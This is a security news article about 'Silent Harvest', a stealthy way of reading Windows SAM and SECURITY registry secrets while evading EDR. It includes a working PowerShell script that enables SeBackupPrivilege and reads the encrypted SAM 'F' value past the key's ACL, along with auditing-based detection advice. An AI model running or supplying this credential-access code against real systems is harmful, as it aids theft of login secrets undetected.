
Unnoticed Extraction of Data: Hidden Windows Secrets Uncovered

Acquiring login credentials is a key step in moving through a corporate network to additional systems, and the tools typically used to collect them are easily spotted. Sud0Ru's write-up lays out how Windows safeguards this sensitive data and discusses the usual attack...


A technique called "Silent Harvest" has recently drawn attention in the security community. It relies on rarely monitored Windows registry APIs to harvest Windows login credentials and secrets without triggering the alerts that typical security solutions raise for the usual credential-dumping tools.

At the heart of the technique is the Local Security Authority (LSA), which manages secrets and login information in Windows. The LSA runs inside its own user-mode process. The SAM (Security Account Manager) and Security databases hold the relevant information; each corresponds to a registry hive that is backed by a hive file on disk.

The SAM database stores Windows users, groups and login information, but no API returns that information in clear text. Silent Harvest instead goes through the registry API itself, using the key-open and value-query routines (named in the write-up as "RegOpenKeyEx" and "RegQueryValueEx") to reach the raw hive data.

When particular open options are set, these routines open the sensitive keys without the usual Access Control List (ACL) check being applied to the caller, which further adds to the technique's stealth.

Once a handle is obtained, ordinary value-query routines read the data straight out of the registry in memory; no hive file is ever written to disk. Because nothing is dumped and none of the high-frequency "red-flag" APIs are called, traditional endpoint detection and response (EDR) systems have little to alert on.

The Security database holds four kinds of object: Policy, Trusted Domain, Account and Secret. Their values are stored in encrypted form and need additional steps to decrypt. The value-query call itself ("RegQueryValueEx"), however, is not commonly monitored by EDR vendors, which leaves an avenue for bypassing detection.
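As an added example (not code from Sud0Ru's write-up or from Rohde & Schwarz), the PowerShell script below shows the access pattern described above end to end: it enables SeBackupPrivilege in the current token, opens a SAM subkey through the Win32 registry API with the documented REG_OPTION_BACKUP_RESTORE open option so that the key's ACL is not applied to the caller, and reads a value straight out of the in-memory hive without exporting anything. The choice of that option, the use of RegCreateKeyExW (the documented Win32 entry point that accepts it; it opens an existing key and reports REG_OPENED_EXISTING_KEY) and the helper names are this example's assumptions, not the write-up's method. It assumes an elevated session on 64-bit Windows with PowerShell 5.1 or later.

```powershell
# Added example, not code from the write-up. Assumptions: 64-bit Windows, elevated PowerShell 5.1+
# (Administrators hold SeBackupPrivilege, disabled until enabled), and the documented
# REG_OPTION_BACKUP_RESTORE open option as the ACL-bypass mechanism.
$native = @"
using System;
using System.Runtime.InteropServices;
public static class RegNative {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state, uint length, IntPtr previous, IntPtr returned);
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode)]
    public static extern int RegCreateKeyExW(IntPtr key, string subKey, uint reserved, string cls, uint options, uint access, IntPtr security, out IntPtr result, out uint disposition);
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode)]
    public static extern int RegQueryValueExW(IntPtr key, string value, IntPtr reserved, out uint type, byte[] data, ref uint size);
    [DllImport("advapi32.dll")]
    public static extern int RegCloseKey(IntPtr key);
}
"@
Add-Type -TypeDefinition $native

function Enable-TokenPrivilege([string]$Name) {
    $token = [IntPtr]::Zero
    $process = [System.Diagnostics.Process]::GetCurrentProcess().Handle
    if (-not [RegNative]::OpenProcessToken($process, 0x28, [ref]$token)) {   # TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
        throw "OpenProcessToken failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $luid = New-Object RegNative+LUID
    if (-not [RegNative]::LookupPrivilegeValue($null, $Name, [ref]$luid)) { throw "Unknown privilege $Name" }
    $state = New-Object RegNative+TOKEN_PRIVILEGES
    $state.PrivilegeCount = 1; $state.Luid = $luid; $state.Attributes = 0x2   # SE_PRIVILEGE_ENABLED
    [void][RegNative]::AdjustTokenPrivileges($token, $false, [ref]$state, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    # AdjustTokenPrivileges returns TRUE even when the privilege is not held; the last error tells.
    if ([Runtime.InteropServices.Marshal]::GetLastWin32Error() -eq 1300) {    # ERROR_NOT_ALL_ASSIGNED
        throw "$Name is not held by this token (run elevated)"
    }
}

function Read-HiveValue([string]$SubKey, [string]$ValueName) {
    $HKLM = [IntPtr]::new([long]-2147483646)   # HKEY_LOCAL_MACHINE = (HKEY)(LONG)0x80000002, sign-extended as winreg.h defines it
    $REG_OPTION_BACKUP_RESTORE = 0x4           # access check replaced by backup semantics when SeBackupPrivilege is enabled
    $KEY_READ = 0x20019
    $key = [IntPtr]::Zero; $disposition = [uint32]0
    $rc = [RegNative]::RegCreateKeyExW($HKLM, $SubKey, 0, $null, $REG_OPTION_BACKUP_RESTORE, $KEY_READ,
                                       [IntPtr]::Zero, [ref]$key, [ref]$disposition)
    if ($rc -ne 0) { throw "Open of HKLM\$SubKey failed with Win32 error $rc" }
    if ($disposition -ne 2) {                  # REG_OPENED_EXISTING_KEY; anything else means we created a key by mistake
        [void][RegNative]::RegCloseKey($key); throw "HKLM\$SubKey did not already exist"
    }
    try {
        $type = [uint32]0; $size = [uint32]0
        $rc = [RegNative]::RegQueryValueExW($key, $ValueName, [IntPtr]::Zero, [ref]$type, $null, [ref]$size)   # size probe
        if ($rc -ne 0) { throw "Size query of $ValueName failed with Win32 error $rc" }
        $data = New-Object byte[] $size
        $rc = [RegNative]::RegQueryValueExW($key, $ValueName, [IntPtr]::Zero, [ref]$type, $data, [ref]$size)  # in-memory read, no hive export
        if ($rc -ne 0) { throw "Read of $ValueName failed with Win32 error $rc" }
        return [PSCustomObject]@{ Key = "HKLM\$SubKey"; Value = $ValueName; Type = $type; Bytes = $data }
    } finally {
        [void][RegNative]::RegCloseKey($key)
    }
}

# Usage: Administrators are denied read access to SAM\SAM\Domains\Account by its ACL on a normal open;
# with backup semantics the raw, still-encrypted "F" value is returned. Decrypting it is a separate step.
Enable-TokenPrivilege 'SeBackupPrivilege'
$f = Read-HiveValue 'SAM\SAM\Domains\Account' 'F'
"{0}\{1}: registry type {2}, {3} bytes read" -f $f.Key, $f.Value, $f.Type, $f.Bytes.Length
```

Two things worth noting when trying this. The open still travels the normal registry code path, so a kernel registry callback registered by an EDR does see a key-open on the SAM path carrying the backup option; whether that produces an alert depends entirely on the vendor's logic, which is the gap the write-up points at. Second, the cheapest independent check is Windows object-access auditing: with the "Registry" audit subcategory enabled and a read SACL on the SAM and SECURITY keys, the handle open and the value read appear as events 4656 and 4663 in the Security log regardless of what the EDR does with its callback.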

A key detection mechanism in modern Endpoint Detection & Response (EDR) software is the kernel-mode callback routine: the EDR driver registers a callback function with the kernel and is notified of registry activity. Silent Harvest, however, operates entirely in memory through routine registry calls, so it does not trip the patterns these callbacks are typically configured to flag.

Silent Harvest is a reminder that defensive strategies must also cover the less common functions. Vendors may eventually add these calls to their monitoring logic, but the technique underscores the need for continuous vigilance and adaptability in an ever-evolving threat landscape.

The researcher who discovered the technique, Sud0Ru, works for Rohde & Schwarz, a global leader in secure communications. The discovery again highlights the value of collaboration between security researchers and organisations in the ongoing defence against cyber threats.
